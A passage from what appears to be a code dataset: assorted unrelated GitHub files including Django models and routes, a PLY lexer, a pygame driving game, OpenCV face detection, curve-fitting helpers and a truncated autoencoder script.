context.caller_stack._pop_frame()\n\n\ndef render_title(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n def title():\n return render_title(context)\n __M_writer = context.writer()\n __M_writer('\\r\\n\\tRentable Items\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_header(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n def header():\n return render_header(context)\n __M_writer = context.writer()\n __M_writer('\\r\\n\\tContact the Colonial Heritage Foundation\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_content(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n all_item = context.get('all_item', UNDEFINED)\n def content():\n return render_content(context)\n __M_writer = context.writer()\n __M_writer('\\r\\n\\r\\n\\t\\r\\n\\t\\t\\r\\n\\t\\t\\t

Rentable Items \\r\\n\\t\\t\\t \\r\\n\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t Create New Rentable Item\\r\\n\\t\\t\\t \\r\\n\\t\\t\\t \\r\\n\\t\\t\\t\\r\\n\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\r\\n\\r\\n\\r\\n\\t\\t\\t\\t\\t\\t\\t\\r\\n')\n        for item in all_item:\n            __M_writer('\\r\\n\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\t\\r\\n\\r\\n\\t\\t\\t\\t\\t\\r\\n\")\n        __M_writer('\\r\\n\\t\\t\\t IDNameConditionNew DamageDamage FeeDue DateLate FeeDescriptionActions ')\n        __M_writer(str(item.id))\n        __M_writer('')\n        __M_writer(str(item.name))\n        __M_writer('')\n        __M_writer(str(item.condition))\n        __M_writer('')\n        __M_writer(str(item.newDamage))\n        __M_writer('')\n        __M_writer(str(item.damageFee))\n        __M_writer('')\n        __M_writer(str(item.dueDate))\n        __M_writer('')\n        __M_writer(str(item.lateFee))\n        __M_writer('')\n        __M_writer(str(item.description))\n        __M_writer(' Edit\\r\\n\\t\\t\\t\\t\\t\\t|\\r\\n\\t\\t\\t\\t\\t\\t Delete
'\n content = Content(f'{title_prefix}_{key}', body)\n result.append(content)\n\n return result\n","repo_name":"gwanos/evernotemaster","sub_path":"evernotecore/contents.py","file_name":"contents.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15157982117","text":"from typing import Set\n\nimport pandas as pd\nfrom sklearn.base import BaseEstimator, TransformerMixin\n\n\ndef remove_stop_words(df: pd.DataFrame, column: str, stopwords: Set) -> pd.DataFrame:\n token_column: str = \"__itsml_tokens\"\n df[token_column] = df[column].str.split()\n df[column] = df[token_column].apply(\n lambda tokens: \" \".join([token for token in tokens if token not in stopwords])\n )\n df = df.drop(columns=[token_column])\n return df\n\n\ndef lowercase(df: pd.DataFrame, column: str) -> pd.DataFrame:\n df[column] = df[column].str.lower()\n return df\n\n\ndef remove_number(df: pd.DataFrame, column: str) -> pd.DataFrame:\n df[column] = df[column].str.replace(r\"\\d+\", \" \", regex=True)\n return df\n\n\ndef remove_accents(df: pd.DataFrame, column: str) -> pd.DataFrame:\n df[column] = (\n df[column]\n .str.normalize(\"NFKD\")\n .str.encode(\"ascii\", errors=\"ignore\")\n .str.decode(\"utf-8\")\n )\n return df\n\n\ndef remove_diacritics(df: pd.DataFrame, column: str) -> pd.DataFrame:\n df[column] = df[column].str.replace(\"[^a-zA-Z]+\", \" \", regex=True)\n return df\n\n\ndef remove_small_tokens(\n df: pd.DataFrame, column: str, min_token_size: int\n) -> pd.DataFrame:\n regex = r\"\\b\" + r\"\\w{0,\" + str(min_token_size) + r\"}\\b\"\n df[column] = df[column].str.replace(regex, \" \", regex=True)\n return df\n\n\ndef remove_extra_spaces(df: pd.DataFrame, column: str) -> pd.DataFrame:\n df[column] = df[column].str.replace(r\" +\", \" \", regex=True).str.strip()\n return df\n\n\ndef default_text_preprocessing_pipeline(\n df: pd.DataFrame, stopwords: Set[str], column: str, min_token_size: int = 0\n) -> pd.DataFrame:\n df = (\n df.pipe(lowercase, column=column)\n .pipe(remove_number, column=column)\n .pipe(remove_accents, column=column)\n .pipe(remove_diacritics, column=column)\n .pipe(remove_small_tokens, column=column, min_token_size=min_token_size)\n .pipe(remove_extra_spaces, column=column)\n .pipe(remove_stop_words, column=column, stopwords=stopwords)\n )\n return df\n\n\nclass TextNormalizationTransformer(BaseEstimator, TransformerMixin):\n def __init__(self, stopwords: Set[str], min_token_size: int = 0):\n self.stopwords = stopwords\n self.column = \"__itsml_temp\"\n self.min_token_size = min_token_size\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X, y=None):\n df = pd.DataFrame({self.column: X}, dtype=str)\n default_text_preprocessing_pipeline(\n df, self.stopwords, self.column, self.min_token_size\n )\n return df[self.column].values\n","repo_name":"itsmeale/itsml","sub_path":"itsml/preprocessing/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"12341312647","text":"from django.conf.urls import url\n#이번시간에는 app별로 url을 관리할 수 있도록 한다\n#그래서 새로운 urls.py를 만듦\n# photos/urls.py\n\nfrom . 
import views\n\n\napp_name = 'photos'\n\nurlpatterns = [\n    url(r'^(?P<pk>[0-9]+)/like/$', views.like_photo, name='like_photo'),\n    url(r'^(?P<pk>[0-9]+)/$', views.view_photo, name='view_photo'),\n    url(r'^$', views.toppage, name='toppage'),\n]\n","repo_name":"jarangseo/pystagram-jarang","sub_path":"instablog-jarang/photos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4707200251","text":"#import all necessary packages\nimport cv2\nfrom cv2 import CascadeClassifier\n\n#cascade file\nclassifier=cv2.CascadeClassifier('data/haarcascade_frontalface_default.xml')\ncap=cv2.VideoCapture(0)\n\n#loop that captures the video as a stream of image frames\nwhile True:\n\n\tret,frame=cap.read() #read the frame\n\n\t#convert the frame to gray scale for detection\n\tgray=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n\tdetections=classifier.detectMultiScale(gray,1.3,5) #this call detects faces with the cascade classifier\n\tif(len(detections)>0):\n\t\t(x,y,w,h)=detections[0]\n\t\tframe=cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2) #draw a rectangle around the detected face\n\tcv2.imshow('frame',frame)\n\n\tif cv2.waitKey(1) & 0xff ==ord('q'): #press 'q' to quit the program\n\t\tbreak\n","repo_name":"Pranjul2002/faceDetection","sub_path":"faceDetection.py","file_name":"faceDetection.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25908023806","text":"#program that accepts a number and prints that many \"*\"\r\n\r\n\r\n#accept a number from the user\r\nnum=int(input(\"enter number\"))\r\n\r\n#function definition\r\ndef displaystar(x):\r\n    for a in range(x):\r\n        print(\"*\",end=\" \")\r\n    \r\n\r\n#function call\r\ndisplaystar(num)\r\n","repo_name":"baigarkalpana/Python_Numbers","sub_path":"Problems_on_Numbers/printstars.py","file_name":"printstars.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21809833015","text":"# Final Project - Compilers\n# Authors: Carmelo Ramirez (A01175987) and Juan Pablo Galaz (A01251406)\n\nimport ply.lex as lex\nimport sys\n\n#------------- LANGUAGE LEXICON ----------\n# VALID TOKENS IN THE LANGUAGE.\ntokens = [\n    'ID',\n    'CTE_I',\n    'CTE_F',\n    'CTE_STR',\n    'BRADER',\n    'BRAIZQ',\n    'CORDER',\n    'CORIZQ',\n    'PARDER',\n    'PARIZQ',\n    'PUNTCOM',\n    'DIF',\n    'MENOR',\n    'MAYOR',\n    'MENIGUAL',\n    'MAYIGUAL',\n    'IGUAL',\n    'AND',\n    'OR',\n    'SUMA',\n    'RESTA',\n    'DIV',\n    'MOD',\n    'MULT',\n    'ASIG',\n    'COMA',\n    'PUNTO'\n]\n\n\n# RESERVED WORDS OF THE LANGUAGE.\npalabrasReservadas = {\n    'if' : 'IF',\n    'else' : 'ELSE',\n    'repeat' : 'REPEAT',\n    'module' : 'MODULE',\n    'import': 'IMPORT',\n    'height': 'HEIGHT',\n    'width': 'WIDTH',\n    'canvas' : 'CANVAS',\n    'print' : 'PRINT',\n    'input' : 'INPUT',\n    'forward' : 'FORWARD',\n    'background': 'BACKGROUND',\n    'backward' : 'BACKWARD',\n    'left' : 'LEFT',\n    'main' : 'MAIN',\n    'right' : 'RIGHT',\n    'turn' : 'TURN',\n    'up' : 'UP',\n    'down' : 'DOWN',\n    'return' : 'RETURN',\n    'circle' : 'CIRCLE',\n    'triangle' : 'TRIANGLE',\n    'square' : 'SQUARE',\n    'ngon' : 'NGON',\n    'arc' : 'ARC',\n    'fill' : 'FILL',\n    'color' : 'COLOR',\n    'rotate' : 'ROTATE',\n    'stretch' : 'STRETCH',\n    'size' : 'SIZE',\n    'int' : 'INT',\n    'float' : 'FLOAT',\n    'void' : 'VOID',\n}\n\n\n# ADD THE RESERVED WORDS TO THE TOKEN LIST.
\ntokens += palabrasReservadas.values()\n\n\n# RULE TO DETECT IDENTIFIERS (reserved words are reclassified to their own token type).\ndef t_ID(t):\n    r'[a-zA-Z_][a-zA-Z_0-9]*'\n    if t.value in palabrasReservadas:\n        t.type = palabrasReservadas[t.value]\n    return t\n\n\n# RULE TO DETECT FLOATING-POINT NUMERIC CONSTANTS.\ndef t_CTE_F(t):\n    r'\\d+\\.\\d+'\n    t.value = float(t.value)\n    return t\n\n\n# RULE TO DETECT INTEGER NUMERIC CONSTANTS.\ndef t_CTE_I(t):\n    r'\\d+'\n    t.value = int(t.value)\n    return t\n\n\n# RULE TO DETECT STRING CONSTANTS.\ndef t_CTE_STR(t):\n    r'\\\"[^\\\"\\~]*\\\"'\n    return t\n\n# RULE TO IGNORE COMMENTS.\ndef t_COMMENT(t):\n    r'\\#[^\\#]*\\#'\n    pass\n\n# RULE TO COUNT LINE NUMBERS.\ndef t_NEWLINE(t):\n    r'\\n+'\n    t.lexer.lineno += len(t.value)\n\n# RULES TO DETECT SPECIAL CHARACTERS.\nt_BRADER = r'\\}'\nt_BRAIZQ = r'\\{'\nt_CORDER = r'\\]'\nt_CORIZQ = r'\\['\nt_PARDER = r'\\)'\nt_PARIZQ = r'\\('\nt_PUNTCOM = r'\\;'\nt_DIF = r'\\!\\='\nt_MENOR = r'\\<'\nt_MAYOR = r'\\>'\nt_MENIGUAL = r'\\<\\='\nt_MAYIGUAL = r'\\>\\='\nt_IGUAL = r'\\=\\='\nt_AND = r'\\&'\nt_OR = r'\\|'\nt_SUMA = r'\\+'\nt_RESTA = r'\\-'\nt_DIV = r'\\/'\nt_MOD = r'\\%'\nt_MULT = r'\\*'\nt_ASIG = r'\\='\nt_COMA = r'\\,'\nt_PUNTO = r'\\.'\nt_ignore = ' \\t'\n\n\n# ERROR MESSAGE.\ndef t_error(t):\n    print(\"Invalid character %s at line %s\" %(t.value[0], t.lexer.lineno))\n    t.lexer.skip(1)\n    sys.exit()\n\n\n# CREATE THE LEXER INSTANCE.\nlexer = lex.lex()\n\n\n# HELPER FUNCTION TO PRINT THE TOKENS FOUND IN A STRING.\ndef verTokens(entrada):\n    lexer.input(entrada)\n    token = lexer.token()\n    while (token is not None):\n        print(token)\n        token = lexer.token()","repo_name":"carmelormz/ProyectoFinalCompiladores","sub_path":"ProyectoFinal_Lex.py","file_name":"ProyectoFinal_Lex.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"35369028185","text":"import pygame\r\npygame.init()\r\n\r\n\r\nsize = [600, 400]\r\n\r\ndisplay = pygame.display.set_mode(size)\r\n\r\nclock = pygame.time.Clock()\r\nFPS = 30\r\n\r\nwhite = (255, 255, 255)\r\nred = (255, 0, 0)\r\nyellow = (240, 230, 170)\r\n\r\ncar_surf = pygame.image.load('images/car.bmp').convert()\r\ncar_surf = pygame.transform.scale(car_surf,\r\n                                  (car_surf.get_width() // 3,\r\n                                   car_surf.get_height() // 3))\r\nfinish_surf = pygame.image.load('images/finish.png')\r\nbackground = pygame.image.load('images/sand.jpg').convert()\r\n\r\ncar_surf.set_colorkey(white)\r\ncar_rect = car_surf.get_rect(center=(size[0] / 2, size[1] / 2))\r\n\r\nbackground = pygame.transform.scale(background,\r\n                                    (background.get_width() // 3,\r\n                                     background.get_height() // 3))\r\n\r\n\r\n\r\ncar_up = car_surf\r\ncar_down = pygame.transform.flip(car_surf, False, True)\r\ncar_left = pygame.transform.rotate(car_surf, 90)\r\ncar_right = pygame.transform.flip(car_left, True, False)\r\ncar_rightup = pygame.transform.rotate(car_surf, -45)\r\ncar_rightdown = pygame.transform.rotate(car_surf, -135)\r\ncar_leftup = pygame.transform.rotate(car_surf, 45)\r\ncar_leftdown = pygame.transform.rotate(car_surf, 135)\r\ncar = car_up\r\nleft = right = down = False\r\nup = True\r\nspeed = 5\r\n\r\nwhile True:\r\n    clock.tick(FPS)\r\n    for event in pygame.event.get():\r\n        if event.type == pygame.QUIT:\r\n            pygame.quit()\r\n            raise SystemExit  # leave the loop; pygame calls fail after quit()\r\n    key = pygame.key.get_pressed()\r\n\r\n    if key[pygame.K_a]:\r\n        left = True\r\n        car = car_left\r\n        car_rect.x -= speed\r\n        if car_rect.x < 0:\r\n            car_rect.x = 0\r\n    else:\r\n        left = False\r\n\r\n    if 
key[pygame.K_d]:\r\n right = True\r\n car = car_right\r\n car_rect.x += speed\r\n if car_rect.right > size[0]:\r\n car_rect.right = size[0]\r\n else:\r\n right = False\r\n\r\n if key[pygame.K_w]:\r\n up = True\r\n car = car_up\r\n car_rect.y -= speed\r\n if car_rect.y < 0:\r\n car_rect.y = 0\r\n else:\r\n up = False\r\n\r\n if key[pygame.K_s]:\r\n down = True\r\n car = car_down\r\n car_rect.y += speed\r\n if car_rect.bottom > size[1]:\r\n car_rect.bottom = size[1]\r\n else:\r\n down = False\r\n\r\n if up and right:\r\n car = car_rightup\r\n if up and left:\r\n car = car_leftup\r\n if down and right:\r\n car = car_rightdown\r\n if down and left:\r\n car = car_leftdown\r\n\r\n car_rect = car.get_rect(center=(car_rect.center))\r\n\r\n\r\n display.blit(background, (0, 0))\r\n display.blit(finish_surf, (0, 0))\r\n display.blit(car, car_rect)\r\n pygame.display.update()\r\n\r\n","repo_name":"Skyt1ess/PyGame_15_06","sub_path":"4/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16900174074","text":"from datetime import datetime\n\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nfrom django.db import models\n\nfrom api_yamdb.settings import MAX_NAME_LENGTH, TRUNCATE_LENGTH\nfrom user.models import User\n\n\nclass Category(models.Model):\n \"\"\"Категории (типы) произведений\"\"\"\n\n name = models.CharField('имя категории', max_length=MAX_NAME_LENGTH)\n slug = models.SlugField('слаг категории', unique=True, db_index=True)\n\n class Meta:\n ordering = ('name',)\n verbose_name = 'категория'\n verbose_name_plural = 'категории'\n\n def __str__(self):\n return (\n self.name[:TRUNCATE_LENGTH] + '...'\n if len(self.name) > TRUNCATE_LENGTH\n else self.name\n )\n\n\nclass Genre(models.Model):\n \"\"\"Жанры произведений\"\"\"\n\n name = models.CharField('имя жанра', max_length=MAX_NAME_LENGTH)\n slug = models.SlugField('cлаг жанра', unique=True, db_index=True)\n\n class Meta:\n ordering = ('name',)\n verbose_name = 'жанр'\n verbose_name_plural = 'жанры'\n\n def __str__(self):\n return (\n self.name[:TRUNCATE_LENGTH] + '...'\n if len(self.name) > TRUNCATE_LENGTH\n else self.name\n )\n\n\nclass Title(models.Model):\n \"\"\"Произведения\"\"\"\n\n name = models.CharField(\n 'название',\n max_length=MAX_NAME_LENGTH,\n db_index=True,\n )\n year = models.SmallIntegerField(\n 'год',\n validators=(\n MaxValueValidator(\n limit_value=datetime.now().year,\n message='год выпуска не может превышать текущий год',\n ),\n ),\n )\n category = models.ForeignKey(\n Category,\n on_delete=models.SET_NULL,\n related_name='titles',\n verbose_name='категория',\n null=True,\n blank=True,\n )\n description = models.TextField(\n 'описание',\n blank=True,\n )\n genre = models.ManyToManyField(\n Genre,\n related_name='titles',\n verbose_name='жанр',\n )\n\n class Meta:\n verbose_name = 'произведение'\n verbose_name_plural = 'произведения'\n ordering = ('name',)\n\n def __str__(self):\n return (\n self.name[:TRUNCATE_LENGTH] + '...'\n if len(self.name) > TRUNCATE_LENGTH\n else self.name\n )\n\n\nclass Review(models.Model):\n \"\"\"Отзывы\"\"\"\n\n title = models.ForeignKey(\n Title,\n on_delete=models.CASCADE,\n related_name='reviews',\n verbose_name='произведение',\n )\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='reviews',\n verbose_name='автор',\n )\n text = models.TextField('текст')\n score = models.IntegerField(\n 'оценка',\n 
validators=(MinValueValidator(1), MaxValueValidator(10)),\n        error_messages={'validators': 'Оценка только от 1 до 10'},\n    )\n    pub_date = models.DateTimeField(\n        'дата публикации',\n        auto_now_add=True,\n        db_index=True,\n    )\n\n    class Meta:\n        verbose_name = 'отзыв'\n        verbose_name_plural = 'отзывы'\n        ordering = ('-pub_date',)\n        constraints = [\n            models.UniqueConstraint(\n                # constraint: one review per work from each author\n                fields=(\n                    'title',\n                    'author',\n                ),\n                name='unique review',\n            ),\n        ]\n\n    def __str__(self):\n        return (\n            self.text[:TRUNCATE_LENGTH] + '...'\n            if len(self.text) > TRUNCATE_LENGTH\n            else self.text\n        )\n\n\nclass Comment(models.Model):\n    review = models.ForeignKey(\n        Review,\n        on_delete=models.CASCADE,\n        related_name='comments',\n        verbose_name='отзыв',\n    )\n    author = models.ForeignKey(\n        User,\n        on_delete=models.CASCADE,\n        related_name='comments',\n        verbose_name='автор',\n    )\n    text = models.TextField('текст комментария')\n    pub_date = models.DateTimeField(\n        'дата публикации',\n        auto_now_add=True,\n        db_index=True,\n    )\n\n    class Meta:\n        verbose_name = 'комментарий'\n        verbose_name_plural = 'комментарии'\n        ordering = ('-pub_date',)\n\n    def __str__(self):\n        return (\n            self.text[:TRUNCATE_LENGTH] + '...'\n            if len(self.text) > TRUNCATE_LENGTH\n            else self.text\n        )\n","repo_name":"DeVarlamov/on-the-wall","sub_path":"api_yamdb/reviews/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4828,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27271633160","text":"# Movie Director Shom\n'''\n666 is said to be the number that signals the end of the world.\n\nThe movie director Shom directs the film series \"The End of the World\".\n\nAn apocalypse number is a number that contains at least three consecutive 6s.\nThe smallest apocalypse number is 666, and the next larger ones are 1666, 2666, ...\n\nSo Shom will title his first film \"The End of the World 666\" and the second\n\"The End of the World 1666\". Generalizing, the title of the Nth film contains\nthe Nth smallest apocalypse number.\n\nWrite a program that prints the number in the title of Shom's Nth film.\n'''\n\n# input\nN=int(input())\nindex_=1
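\n# Brute force: walk the integers upward, counting those whose decimal form contains \"666\"; the Nth such number is the answer.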
\nfor i in range(10000000):\n    if \"666\" in str(i):\n        if index_ == N:\n            print(i)\n            break\n        index_ += 1\n# Accepted, but find the underlying rule and solve it again without brute force\n","repo_name":"mseo39/python","sub_path":"python_algorithm/step11/1436.py","file_name":"1436.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33450767538","text":"class UnionFind():\n    # union-find over the 26 lowercase letters; each class is represented by its\n    # lexicographically smallest member (see the ord() comparison in union)\n    def __init__(self) -> None:\n        self.root = {chr(i):chr(i) for i in range(97,123)}\n\n    def find(self, x):\n        # path compression\n        if self.root[x] != x:\n            self.root[x] = self.find(self.root[x])\n        return self.root[x]\n\n    def union(self,x,y):\n        repX = self.find(x)\n        repY = self.find(y)\n\n        if repX != repY:\n            # keep the alphabetically smaller letter as the representative\n            if ord(repX) < ord(repY):\n                self.root[repY] = repX\n            else:\n                self.root[repX] = repY\n\n    def connected(self,x,y):\n        return self.find(x) == self.find(y)\n\n    def get(self):\n        return self.root\n\n\nclass Solution:\n    def smallestEquivalentString(self, s1: str, s2: str, baseStr: str) -> str:\n        rep = UnionFind()\n\n        for ind in range(len(s1)):\n            x = s1[ind]\n            y = s2[ind]\n            rep.union(x,y)\n\n        ans = []\n        root = rep.get()\n\n        for char in baseStr:\n            ans.append(rep.find(char))\n\n        return \"\".join(ans)\n","repo_name":"yonasengdu/Compitative-programming","sub_path":"1061-lexicographically-smallest-equivalent-string/1061-lexicographically-smallest-equivalent-string.py","file_name":"1061-lexicographically-smallest-equivalent-string.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"6324191530","text":"import cgi\nimport sys\nimport os\nsys.path.append(os.getcwd()) # add the current project directory to the module search path\nfrom com.aowin.dao import LoginDao\nimport http.cookies\n\n# read the submitted data\nfield = cgi.FieldStorage() # all data submitted by the client\nusername = field.getvalue(\"username\")\nuserpwd = field.getvalue(\"userpwd\")\n\n# query the database\ntry:\n    login = LoginDao.login(username, userpwd)\n    if login:\n        result = \"success\"\n    else:\n        result = \"fail\"\nexcept Exception:\n    result = \"error\"\n\n# respond\nprint('access-control-allow-origin: *')\nprint(\"\")\nprint(result, end=\"\")\n\n","repo_name":"huiba7i/Mycode","sub_path":"python/item/myWeb/cgi-bin/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16597583978","text":"# use OS for file IO and the like\nimport os\n# use numpy for array operations\nimport numpy as np\n# Use CSV for writing human readable files\nimport csv\nfrom scipy.optimize import curve_fit\n# path!\nimport ntpath\n# for argument parsing easily\nimport argparse\n# for getting formatted times\nimport time\nfrom scipy.optimize import basinhopping\n\n\n# Stats\ndef RSQ(predicted,actual):\n    # given predicted and actual values, get the RSQ\n    meanObs = np.mean(actual)\n    SS_Res = np.sum((predicted-actual)**2)\n    SS_Tot = np.sum((actual-meanObs)**2)\n    return 1 - SS_Res/SS_Tot\n\ndef lineIntersect(slope1,intercept1,slope2,intercept2):\n    return (intercept1-intercept2)/(slope2-slope1)\n\n# assumes that aThenBX are lists for the two lines\ndef lineIntersectParam(aThenB1,aThenB2):\n    return lineIntersect(aThenB1[0],aThenB1[1],aThenB2[0],aThenB2[1])\n\ndef linModel(xData,a,b):\n    # y = ax+b\n    return xData*a+b\n\ndef 
GenFit(x,y,model=linModel,**kwargs):\n params,Cov = curve_fit(f=model,xdata=x,ydata=y,**kwargs)\n # the square root of the diagonal elements are the standard deviations\n paramsStd = np.sqrt(np.diag(Cov))\n predicted = model(x,*params)\n return params,paramsStd,predicted\n\ndef fitInfo(x,y,units=['',''],model=linModel,varStr=['a','b'],\n modelStr=\"y=a*x+b\"\n ,degFit=1,fmtStr=\".3g\",full=False,simplify=True,**kwargs):\n # get all the information you could want about the fit.\n # XXX TODO: add in support for non linear models.\n # x: observed x\n # y: observed y\n # units: units of the variables in varStr\n # varStr: parameters of the fit. goes from high degree to low \n # modelStr: describing the model.\n # degFit: degree of the model\n # fmtStr: formating of the data\n # full : if we should return all the data\n params,paramsStd,predicted = GenFit(x,y,model,**kwargs)\n R_SQ = RSQ(predicted,y)\n # if RSQ is very close to 1 (XXX add parameter?) don't display, since\n # we are likely not interested in an actual fit...\n if (not simplify or (R_SQ-1) > 1.e-6):\n modelStr += \"\\nRSQ: {:.3f}\".format(R_SQ)\n for label,mean,stdev,unitTmp in zip(varStr,params,paramsStd,units):\n tempMStr = (\"\\n{:5s}={:\" + fmtStr + \"}\").format(label,mean)\n # if either in range or told not to simplify, add the stdev\n if (not (np.isfinite(stdev) or stdev<0 or stdev == float('inf'))\n or not simplify):\n tempMStr += \"+/-{:.1g}\".format(stdev)\n modelStr += tempMStr\n # add the units (if we have any)\n if (len(unitTmp) > 0):\n modelStr += \"[{:s}]\".format(unitTmp)\n if (full):\n return predicted,modelStr,params,paramsStd,RSQ\n else:\n return predicted,modelStr\n\n\ndef TaylorSeries(x,y,deg=1,ZeroX=False,ZeroY=False,**kwargs):\n \"\"\"\n Args:\n x: x to fit\n y: y to fit\n deg: degree of the fit\n ZeroX: if true, offsets the series so that x[0] -> 0\n ZeroY: if true, offsets the series so that y[0] -> 0\n Returns:\n return of polyfit\n \"\"\"\n offsetX = x[0] if ZeroX else 0\n offsetY = y[0] if ZeroY else 0\n return np.polyfit(x-offsetX,y-offsetY,deg=deg)\n\n\ndef BasinHop(funcToMinimize,x0,boundsBasin,method=\"TNC\",disp=False,\n interval=10,niter=30,niter_success=10,T=1,stepsize=0.001,\n ftol=1e-3,xtol=1e-3,gtol=1e-3):\n \"\"\"\n Returns the result of basin hopping, given the arguments:\n\n Args:\n funcToMinimize: function to minimize, should take in the parameters\n as described by scipy's basinhopping routine\n \n x0: initial guessses, one per minimizer\n \n boundsBasin: the bounds, same size as x0. 
open ends of intervals are \n None\n\n all others: consult basinhopping function\n \"\"\"\n # the minimizer itself (for each 'basin') takes keywords\n # here, we are a little less 'picky' about the function tolerances\n # than before\n minimizer_kwargs = dict(method=method,bounds=boundsBasin,\n options=dict(ftol=ftol,xtol=xtol,gtol=gtol))\n # use basin-hopping to get a solid guess of where we should start\n obj = basinhopping(funcToMinimize,x0=x0,disp=disp,T=T,\n stepsize=stepsize,minimizer_kwargs=minimizer_kwargs,\n niter_success=niter_success,interval=interval,\n niter=niter)\n return obj\n","repo_name":"prheenan/BioModel","sub_path":"FitUtils/Python/FitUtil.py","file_name":"FitUtil.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18948200256","text":"from sklearn.datasets import load_boston\nfrom sklearn.linear_model import LinearRegression, SGDRegressor\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef mylinear():\n lb = load_boston()\n # print(lb.DESCR)\n x_train, x_test, y_train, y_test = train_test_split(lb.data, lb.target, test_size=0.25)\n\n # print(x_train)\n # print(x_test)\n std_x = StandardScaler()\n\n x_train = std_x.fit_transform(x_train)\n x_test = std_x.fit_transform(x_test)\n\n std_y=StandardScaler()\n\n y_train = std_y.fit_transform(y_train.reshape(-1,1))\n y_test = std_y.fit_transform(y_test.reshape(-1, 1))\n\n lr= LinearRegression()\n lr.fit(x_train,y_train)\n print(lr.coef_)\n\n y_predict=std_y.inverse_transform(lr.predict(x_test))\n print('ceshijiage',y_predict)\n\n return None\n\n\nif __name__ == \"__main__\":\n mylinear()\n#","repo_name":"jieye-ericx/learn-python","sub_path":"22/my/03.py","file_name":"03.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3611140978","text":"from app.views import mobile\n\nMOBILE_ROUTES = (\n (mobile.index, '/mobile'),\n (mobile.category, '/mobile/category'),\n (mobile.cart, '/mobile/cart'),\n (mobile.item, '/mobile/item'),\n (mobile.comment, '/mobile/comment'),\n (mobile.pay, '/mobile/pay'),\n (mobile.wallet, '/mobile/wallet'),\n (mobile.order, '/mobile/order'),\n (mobile.aftersales, '/mobile/aftersales'),\n (mobile.me, '/mobile/me')\n)\n","repo_name":"kapokcloud-inc/theonestore","sub_path":"app/routes/mobile.py","file_name":"mobile.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"17130873787","text":"import matplotlib.pyplot as plt\r\nimport matplotlib.ticker as ticker\r\nfrom AE_ModelConstruction import *\r\nBATCH_SIZE2 = 60\r\nthreshold=0.7845413302380952\r\nlayer=2\r\ninput_num=14\r\n\r\nname_list=['ae_D0_temp','ae_D1_temp','ae_D2_temp']#数据文件名\r\nnp_D,np_Dmax,np_Dmin=Traindata(name_list)#加载训练集\r\n\r\n#选择测试集还是验证集\r\n# dict_Kobs=io.loadmat('ae_Kobs3_temp') #测试集\r\n# np_Kobs=dict_Kobs['ae_Kobs2']\r\ndict_Kobs=io.loadmat('ae_ver_temp') #验证集\r\nnp_Kobs=dict_Kobs['ae_ver_temp']\r\n\r\nnp_Kobs=np_Kobs[:,4:]\r\nnp_Kobs=(np_Kobs-np_Dmin)/(np_Dmax-np_Dmin)\r\nKobs_num=np.size(np_Kobs,axis=0)\r\n\r\ntorch_Kobs=torch.from_numpy(np_Kobs).float()\r\nprint(torch_Kobs.shape)\r\ntest_loader = 